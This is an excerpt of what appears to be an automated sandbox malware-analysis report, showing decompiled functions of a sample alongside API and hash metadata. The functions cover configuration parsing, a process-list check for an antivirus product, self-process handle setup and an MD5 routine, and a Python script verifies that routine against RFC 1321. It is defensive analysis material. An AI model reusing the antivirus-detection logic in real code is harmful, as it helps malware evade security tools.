            						_t50 = E020236C5(_t104, _t102, _t78 ^ 0x02ddbcae);
            					}
            					if(_t50 == 0) {
            						L41:
            						 *0x202a2ec = 5;
            						goto L42;
            					} else {
            						_t104 =  &_v8;
            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
            							goto L41;
            						} else {
            							L42:
            							if(_t102 == 0) {
            								_t51 = 0;
            							} else {
            								_t75 =  *0x202a344; // 0x43175ac3
            								_t51 = E020236C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
            							}
            							if(_t51 != 0) {
            								_push(_t51);
            								_t72 = 0x10;
            								_t73 = E02025B85(_t72);
            								if(_t73 != 0) {
            									_push(_t73);
            									E0202607C();
            								}
            							}
            							if(_t102 == 0) {
            								_t52 = 0;
            							} else {
            								_t70 =  *0x202a344; // 0x43175ac3
            								_t52 = E020236C5(_t104, _t102, _t70 ^ 0x93710135);
            							}
            							if(_t52 != 0 && E02025B85(0, _t52) != 0) {
            								_t122 =  *0x202a3cc; // 0x2ca9600
            								E02025364(_t122 + 4, _t68);
            							}
            							if(_t102 == 0) {
            								_t53 = 0;
            							} else {
            								_t65 =  *0x202a344; // 0x43175ac3
            								_t53 = E020236C5(_t104, _t102, _t65 ^ 0x175474b7);
            							}
            							if(_t53 == 0) {
            								L59:
            								_t54 =  *0x202a348; // 0xc7d5a8
            								_t22 = _t54 + 0x202b5f3; // 0x616d692f: default string, little-endian ASCII beginning "/ima"
            								 *0x202a370 = _t22;
            								goto L60;
            							} else {
            								_t64 = E02025B85(0, _t53);
            								 *0x202a370 = _t64;
            								if(_t64 != 0) {
            									L60:
            									if(_t102 == 0) {
            										_t56 = 0;
            									} else {
            										_t61 =  *0x202a344; // 0x43175ac3
            										_t56 = E020236C5(_t104, _t102, _t61 ^ 0xf8a29dde);
            									}
            									if(_t56 == 0) {
            										_t57 =  *0x202a348; // 0xc7d5a8
            										_t23 = _t57 + 0x202b899; // 0x6976612e: default string, little-endian ASCII beginning ".avi"
            										_t58 = _t23;
            									} else {
            										_t58 = E02025B85(0, _t56);
            									}
            									 *0x202a3e0 = _t58;
            									HeapFree( *0x202a2d8, 0, _t102);
            									_v12 = 0;
            									goto L67;
            								}
            								goto L59;
            							}
            						}
            					}
            				}
            			}

            Instruction address range: 0x02021d8a to 0x02022050

            APIs
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021E2F
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021E61
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021E93
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021EC5
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021EF7
            • StrToIntExA.SHLWAPI(00000000,00000000,?,0202A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02021F29
            • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02022028
            • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 0202203C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: FreeHeap
            • String ID: Uet
            • API String ID: 3298025750-2766386878
            • Opcode ID: a9ed82c16a7b06c2b18c39991836e34999a2941e54638d163e9b43420fb57a08
            • Instruction ID: fa4398070ce2ada1e03b549db445e254815189435cd5a28b28ac465ee9a655d9
            • Opcode Fuzzy Hash: a9ed82c16a7b06c2b18c39991836e34999a2941e54638d163e9b43420fb57a08
            • Instruction Fuzzy Hash: 6E819470B00324AFCB61DBB48EC8D9FB6EEAB487147750D27A509D3105EB79D95CAB20
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E020230D5() {
            				char _v264;
            				void* _v300;
            				int _t8;
            				intOrPtr _t9;
            				int _t15;
            				void* _t17;
            
            				_t15 = 0;
            				_t17 = CreateToolhelp32Snapshot(2, 0); // TH32CS_SNAPPROCESS
            				if(_t17 != 0) {
            					_t8 = Process32First(_t17,  &_v300); // _v300 is the PROCESSENTRY32 record
            					while(_t8 != 0) {
            						_t9 =  *0x202a348; // 0xc7d5a8
            						_t2 = _t9 + 0x202be88; // 0x73617661: little-endian ASCII "avas", the start of an AV product's process name
            						_push( &_v264); // PROCESSENTRY32.szExeFile (offset 36 of the record)
            						if( *0x202a12c() != 0) { // indirect call through a resolved import: matches szExeFile against that string
            							_t15 = 1; // AV process found
            						} else {
            							_t8 = Process32Next(_t17,  &_v300);
            							continue;
            						}
            						L7:
            						CloseHandle(_t17);
            						goto L8;
            					}
            					goto L7;
            				}
            				L8:
            				return _t15;
            			}

            Instruction address range: 0x020230e0 to 0x0202313e

            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 020230E5
            • Process32First.KERNEL32(00000000,?), ref: 020230F8
            • Process32Next.KERNEL32(00000000,?), ref: 02023124
            • CloseHandle.KERNEL32(00000000), ref: 02023133
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
            • String ID:
            • API String ID: 420147892-0
            • Opcode ID: e8cfbdffe8c25a5800aba3cbcc961cdf03b6d14205e05a5d6a7773875577978c
            • Instruction ID: d91ef9574c58af9c44046ba6d8c3cd5ea9a9eca37eb19cdfd6ad20ff99b82382
            • Opcode Fuzzy Hash: e8cfbdffe8c25a5800aba3cbcc961cdf03b6d14205e05a5d6a7773875577978c
            • Instruction Fuzzy Hash: E0F096326003745ADB31A7669C89FDB76ACEB85310F0100A3EE45D2000EB28D65DDA61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401D68() {
            				void* _t1;
            				unsigned int _t3;
            				void* _t4;
            				long _t5;
            				void* _t6;
            				intOrPtr _t10;
            				void* _t14;
            
            				_t10 =  *0x404170;
            				_t1 = CreateEventA(0, 1, 0, 0); // manual-reset event, kept in a global
            				 *0x40417c = _t1;
            				if(_t1 == 0) {
            					return GetLastError();
            				}
            				_t3 = GetVersion(); // low byte = major version, next byte = minor version
            				if(_t3 != 5) { // the decompiler has flattened the major/minor comparison: _t14 is only assigned on the else path
            					L4:
            					if(_t14 <= 0) {
            						_t4 = 0x32; // ERROR_NOT_SUPPORTED: Windows 2000 (5.0) is refused
            						return _t4;
            					} else {
            						goto L5;
            					}
            				} else {
            					if(_t3 >> 8 > 0) { // major 5 with minor > 0, i.e. Windows XP or Server 2003
            						L5:
            						 *0x40416c = _t3;
            						_t5 = GetCurrentProcessId();
            						 *0x404168 = _t5;
            						 *0x404170 = _t10;
            						// 0x10047a = SYNCHRONIZE | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, opened on its own PID
            						_t6 = OpenProcess(0x10047a, 0, _t5);
            						 *0x404164 = _t6;
            						if(_t6 == 0) {
            							 *0x404164 =  *0x404164 | 0xffffffff; // fall back to -1, the GetCurrentProcess() pseudo-handle
            						}
            						return 0;
            					} else {
            						_t14 = _t3 - _t3;
            						goto L4;
            					}
            				}
            			}

            Instruction address range: 0x00401d69 to 0x00401ddb

            APIs
            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
            • GetVersion.KERNEL32 ref: 00401D86
            • GetCurrentProcessId.KERNEL32 ref: 00401DA2
            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: Process$CreateCurrentEventOpenVersion
            • String ID:
            • API String ID: 845504543-0
            • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
            • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
            • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
            Uniqueness

            Uniqueness Score: -1.00%

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_1fc0000_Server.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: .$GetProcAddress.$l
            • API String ID: 0-2784972518
            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction ID: 4f9cfe251a72ca159fbf4fc79e39fe33bf16e20f35afd1b8c11fb9f49f0634be
            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
            • Instruction Fuzzy Hash: 993139B690060ADFDB10CF99C980AEDBBF5FF48724F14414AE441A7711DB71EA45CBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 49%
            			E020216DF(void* __ecx, intOrPtr* _a4) {
            				signed int _v8;
            				signed int _v12;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				intOrPtr _v36;
            				intOrPtr _v40;
            				intOrPtr _v44;
            				intOrPtr _v48;
            				intOrPtr _v52;
            				intOrPtr _v56;
            				intOrPtr _v60;
            				intOrPtr _v64;
            				intOrPtr _v68;
            				intOrPtr _v72;
            				void _v76;
            				intOrPtr* _t226;
            				signed int _t229;
            				signed int _t231;
            				signed int _t233;
            				signed int _t235;
            				signed int _t237;
            				signed int _t239;
            				signed int _t241;
            				signed int _t243;
            				signed int _t245;
            				signed int _t247;
            				signed int _t249;
            				signed int _t251;
            				signed int _t253;
            				signed int _t255;
            				signed int _t257;
            				signed int _t259;
            				signed int _t338;
            				signed char* _t348;
            				signed int _t349;
            				signed int _t351;
            				signed int _t353;
            				signed int _t355;
            				signed int _t357;
            				signed int _t359;
            				signed int _t361;
            				signed int _t363;
            				signed int _t365;
            				signed int _t367;
            				signed int _t376;
            				signed int _t378;
            				signed int _t380;
            				signed int _t382;
            				signed int _t384;
            				intOrPtr* _t400;
            				signed int* _t401;
            				signed int _t402;
            				signed int _t404;
            				signed int _t406;
            				signed int _t408;
            				signed int _t410;
            				signed int _t412;
            				signed int _t414;
            				signed int _t416;
            				signed int _t418;
            				signed int _t420;
            				signed int _t422;
            				signed int _t424;
            				signed int _t432;
            				signed int _t434;
            				signed int _t436;
            				signed int _t438;
            				signed int _t440;
            				signed int _t508;
            				signed int _t599;
            				signed int _t607;
            				signed int _t613;
            				signed int _t679;
            				void* _t682;
            				signed int _t683;
            				signed int _t685;
            				signed int _t690;
            				signed int _t692;
            				signed int _t697;
            				signed int _t699;
            				signed int _t718;
            				signed int _t720;
            				signed int _t722;
            				signed int _t724;
            				signed int _t726;
            				signed int _t728;
            				signed int _t734;
            				signed int _t740;
            				signed int _t742;
            				signed int _t744;
            				signed int _t746;
            				signed int _t748;
            
            				_t226 = _a4;
            				_t348 = __ecx + 2;
            				_t401 =  &_v76;
            				_t682 = 0x10;
            				// Decode the 64-byte block into 16 little-endian words: _v76 is M[0],
            				// _v72 is M[1], ... _v16 is M[15]. _t348 starts at byte 2 of the block, so
            				// each word is assembled as block[4i+3] << 24 | block[4i+2] << 16 | block[4i+1] << 8 | block[4i].
            				do {
            					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
            					_t401 =  &(_t401[1]);
            					_t348 =  &(_t348[4]);
            					_t682 = _t682 - 1;
            				} while (_t682 != 0);
            				_t6 = _t226 + 4; // 0x14eb3fc3
            				_t683 =  *_t6;                                   // B
            				_t7 = _t226 + 8; // 0x8d08458b
            				_t402 =  *_t7;                                   // C
            				_t8 = _t226 + 0xc; // 0x56c1184c
            				_t349 =  *_t8;                                   // D (A is read as *_t226 in the first step)
            				// Round 1, steps 1-16: F(b,c,d) = (b & c) | (~b & d), words M[0..15] in order,
            				// rotates 7, 12, 17, 22 (ror 15 == rol 17, ror 10 == rol 22).
            				asm("rol eax, 0x7");
            				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
            				asm("rol ecx, 0xc");
            				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
            				asm("ror edx, 0xf");
            				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
            				asm("ror esi, 0xa");
            				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
            				_v8 = _t685;
            				_t690 = _v8;
            				asm("rol eax, 0x7");
            				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
            				asm("rol ecx, 0xc");
            				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
            				asm("ror edx, 0xf");
            				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
            				asm("ror esi, 0xa");
            				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
            				_v8 = _t692;
            				_t697 = _v8;
            				asm("rol eax, 0x7");
            				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
            				asm("rol ecx, 0xc");
            				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
            				asm("ror edx, 0xf");
            				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
            				asm("ror esi, 0xa");
            				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
            				_v8 = _t699;
            				asm("rol eax, 0x7");
            				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
            				asm("rol ecx, 0xc");
            				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
            				_t508 =  !_t357;
            				asm("ror edx, 0xf");
            				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
            				_v12 = _t410;
            				_v12 =  !_v12;
            				asm("ror esi, 0xa");
            				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
            				// Round 2, steps 17-32: G(b,c,d) = (b & d) | (c & ~d), words M[(5i+1) mod 16],
            				// rotates 5, 9, 14, 20 (ror 12 == rol 20).
            				asm("rol eax, 0x5");
            				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
            				asm("rol ecx, 0x9");
            				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
            				asm("rol edx, 0xe");
            				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
            				asm("ror esi, 0xc");
            				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
            				asm("rol eax, 0x5");
            				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
            				asm("rol ecx, 0x9");
            				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
            				asm("rol edx, 0xe");
            				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
            				asm("ror esi, 0xc");
            				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
            				asm("rol eax, 0x5");
            				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
            				asm("rol ecx, 0x9");
            				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
            				asm("rol edx, 0xe");
            				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
            				asm("ror esi, 0xc");
            				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
            				asm("rol eax, 0x5");
            				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
            				asm("rol ecx, 0x9");
            				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
            				asm("rol edx, 0xe");
            				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
            				asm("ror esi, 0xc");
            				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
            				// Round 3, steps 33-48: H(b,c,d) = b ^ c ^ d, words M[(3i+5) mod 16],
            				// rotates 4, 11, 16, 23 (ror 9 == rol 23).
            				asm("rol eax, 0x4");
            				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
            				asm("rol ecx, 0xb");
            				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
            				asm("rol edx, 0x10");
            				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
            				_t599 = _t367 ^ _t420;
            				asm("ror esi, 0x9");
            				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
            				asm("rol eax, 0x4");
            				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
            				asm("rol edi, 0xb");
            				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
            				asm("rol edx, 0x10");
            				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
            				_t338 = _t607 ^ _t422;
            				asm("ror ecx, 0x9");
            				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
            				asm("rol eax, 0x4");
            				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
            				asm("rol esi, 0xb");
            				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
            				asm("rol edi, 0x10");
            				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
            				_t424 = _t734 ^ _t613;
            				asm("ror ecx, 0x9");
            				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
            				asm("rol eax, 0x4");
            				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
            				asm("rol edx, 0xb");
            				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
            				asm("rol esi, 0x10");
            				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
            				asm("ror ecx, 0x9");
            				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
            				// Round 4, steps 49-64: I(b,c,d) = c ^ (b | ~d), words M[7i mod 16],
            				// rotates 6, 10, 15, 21 (ror 11 == rol 21).
            				asm("rol eax, 0x6");
            				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
            				asm("rol edx, 0xa");
            				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
            				asm("rol esi, 0xf");
            				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
            				asm("ror ecx, 0xb");
            				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
            				asm("rol eax, 0x6");
            				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
            				asm("rol edx, 0xa");
            				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
            				asm("rol esi, 0xf");
            				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
            				asm("ror ecx, 0xb");
            				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
            				asm("rol eax, 0x6");
            				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
            				asm("rol edx, 0xa");
            				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
            				asm("rol esi, 0xf");
            				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
            				asm("ror edi, 0xb");
            				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
            				asm("rol eax, 0x6");
            				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
            				asm("rol edx, 0xa");
            				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
            				_t400 = _a4;
            				asm("rol esi, 0xf");
            				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
            				 *_t400 =  *_t400 + _t259;                                   // A += a
            				asm("ror eax, 0xb");
            				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;   // step 64 folded into B += b
            				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;    // C += c
            				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;  // D += d
            				// Wipe the 16 decoded message words from the stack before returning.
            				return memset( &_v76, 0, 0x40);
            			}
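
Whether a recovered hash routine is stock or tweaked is the first thing to settle, because only a stock routine lets hashlib reproduce whatever the sample computes with it. The Python below is an added check, not code from the report or from the sample: the three LISTING_* tables are my transcription of the listing above (each step's additive constant as the decompiler printed it, the message word it reads with _v76 as M[0] and _v16 as M[15], and the rotate from the preceding asm() line), they are compared with the tables RFC 1321 defines, and the round structure read off the listing is run against known single-block MD5 digests.

```python
"""Check that E020216DF, as decompiled above, is unmodified MD5 (RFC 1321).

LISTING_K, LISTING_M and LISTING_ROT are transcribed from the listing: the
signed constant of each step, the message word it reads (_v76 = M[0] ...
_v16 = M[15]) and the rotate from the asm() line before it.
"""
import math
import struct

LISTING_K = [
    -0x28955b88, -0x173848aa, 0x242070db, -0x3e423112, -0xa83f051, 0x4787c62a, -0x57cfb9ed, -0x2b96aff,
    0x698098d8, -0x74bb0851, -0xa44f, -0x76a32842, 0x6b901122, -0x2678e6d, -0x5986bc72, 0x49b40821,
    -0x9e1da9e, -0x3fbf4cc0, 0x265e5a51, -0x16493856, -0x29d0efa3, 0x2441453, -0x275e197f, -0x182c0438,
    0x21e1cde6, -0x3cc8f82a, -0xb2af279, 0x455a14ed, -0x561c16fb, -0x3105c08, 0x676f02d9, -0x72d5b376,
    -0x5c6be, -0x788e097f, 0x6d9d6122, -0x21ac7f4, -0x5b4115bc, 0x4bdecfa9, -0x944b4a0, -0x41404390,
    0x289b7ec6, -0x155ed806, -0x2b10cf7b, 0x4881d05, -0x262b2fc7, -0x1924661b, 0x1fa27cf8, -0x3b53a99b,
    -0xbd6ddbc, 0x432aff97, -0x546bdc59, -0x36c5fc7, 0x655b59c3, -0x70f3336e, -0x100b83, -0x7a7ba22f,
    0x6fa87e4f, -0x1d31920, -0x5cfebcec, 0x4e0811a1, -0x8ac817e, -0x42c50dcb, 0x2ad7d2bb, -0x14792c6f,
]
LISTING_M = [
    0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
    1, 6, 11, 0, 5, 10, 15, 4, 9, 14, 3, 8, 13, 2, 7, 12,
    5, 8, 11, 14, 1, 4, 7, 10, 13, 0, 3, 6, 9, 12, 15, 2,
    0, 7, 14, 5, 12, 3, 10, 1, 8, 15, 6, 13, 4, 11, 2, 9,
]
LISTING_ROT = ([("rol", 7), ("rol", 12), ("ror", 15), ("ror", 10)] * 4
               + [("rol", 5), ("rol", 9), ("rol", 14), ("ror", 12)] * 4
               + [("rol", 4), ("rol", 11), ("rol", 16), ("ror", 9)] * 4
               + [("rol", 6), ("rol", 10), ("rol", 15), ("ror", 11)] * 4)


def listing_tables():
    """Listing tables as unsigned constants, word indices and left-rotate amounts
    (a 32-bit "ror n" equals "rol 32-n")."""
    k = [c & 0xFFFFFFFF for c in LISTING_K]
    s = [n if op == "rol" else 32 - n for op, n in LISTING_ROT]
    return k, list(LISTING_M), s


def rfc1321_tables():
    """K[i] = floor(2^32 * |sin(i + 1)|), word schedule and shift table from RFC 1321."""
    k = [int(abs(math.sin(i + 1)) * 2 ** 32) & 0xFFFFFFFF for i in range(64)]
    m = (list(range(16)) + [(5 * i + 1) % 16 for i in range(16)]
         + [(3 * i + 5) % 16 for i in range(16)] + [(7 * i) % 16 for i in range(16)])
    s = [7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4 + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4
    return k, m, s


def listing_matches_rfc1321():
    """True when constants, word order and rotates all equal standard MD5."""
    return listing_tables() == rfc1321_tables()


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md5_compress(state, block):
    """One call of E020216DF: state = the four words at _a4, block = the 64 bytes at __ecx."""
    k, m, s = listing_tables()
    w = struct.unpack("<16I", block)          # the little-endian byte assembly loop at the top
    a, b, c, d = state
    for i in range(64):
        if i < 16:
            f = (b & c) | (~b & d)             # round 1, listing: (!b & d) | (c & b)
        elif i < 32:
            f = (b & d) | (c & ~d)             # round 2, listing: (!d & c) | (b & d)
        elif i < 48:
            f = b ^ c ^ d                      # round 3
        else:
            f = c ^ (b | ~d)                   # round 4, listing: (!d | b) ^ c
        f = (f + a + k[i] + w[m[i]]) & 0xFFFFFFFF
        a, d, c, b = d, c, b, (b + _rotl(f, s[i])) & 0xFFFFFFFF   # a' = b + rotl(sum, s)
    return [(x + y) & 0xFFFFFFFF for x, y in zip(state, (a, b, c, d))]   # the four "+=" stores


def md5_single_block(msg: bytes) -> str:
    """Hex MD5 of a message shorter than 56 bytes (one padded block) using md5_compress."""
    if len(msg) >= 56:
        raise ValueError("single-block helper: message must be shorter than 56 bytes")
    block = msg + b"\x80" + b"\x00" * (55 - len(msg)) + struct.pack("<Q", 8 * len(msg))
    iv = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    return struct.pack("<4I", *md5_compress(iv, block)).hex()


if __name__ == "__main__":
    print("listing tables equal RFC 1321:", listing_matches_rfc1321())
    print("md5('abc') =", md5_single_block(b"abc"))
```

If any of the three comparisons fails on another sample, the mismatching table tells you what was changed (constants, schedule or rotates) and md5_compress can be adjusted to reproduce the variant; here all three match, so hashlib.md5 is a faithful stand-in for this routine.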

            Instruction addresses 0x020216e2 through 0x02021d87 (the per-line address column of the listing above, detached from its code lines during extraction)

            APIs
